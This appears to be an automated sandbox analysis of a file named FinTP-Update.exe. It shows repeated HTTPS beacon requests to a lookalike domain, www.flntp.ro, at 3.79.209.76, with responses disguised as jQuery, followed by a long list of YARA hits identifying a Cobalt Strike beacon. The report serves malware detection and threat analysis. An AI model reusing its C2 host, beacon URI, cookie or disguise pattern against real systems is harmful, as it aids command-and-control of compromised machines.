                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:00 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:00 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            48 | 192.168.2.5 | 49983 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:14:02 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:02 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:02 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:02 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            49 | 192.168.2.5 | 49989 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:14:04 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:05 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:04 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:05 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            50 | 192.168.2.5 | 49995 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:14:06 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:07 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:07 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:07 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            51 | 192.168.2.5 | 50001 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:14:08 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:09 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:09 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:09 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 50007 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:14:10 UTC | 485 | OUT
GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:14:11 UTC | 235 | IN
HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:11 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:14:11 UTC | 5607 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Target ID:0
                                                                                                                            Start time:17:12:07
                                                                                                                            Start date:19/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\FinTP-Update.exe"
                                                                                                                            Imagebase:0x7ff7193c0000
                                                                                                                            File size:18'432 bytes
                                                                                                                            MD5 hash:4038D28C25E96E0E4045B3BC1093F497
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
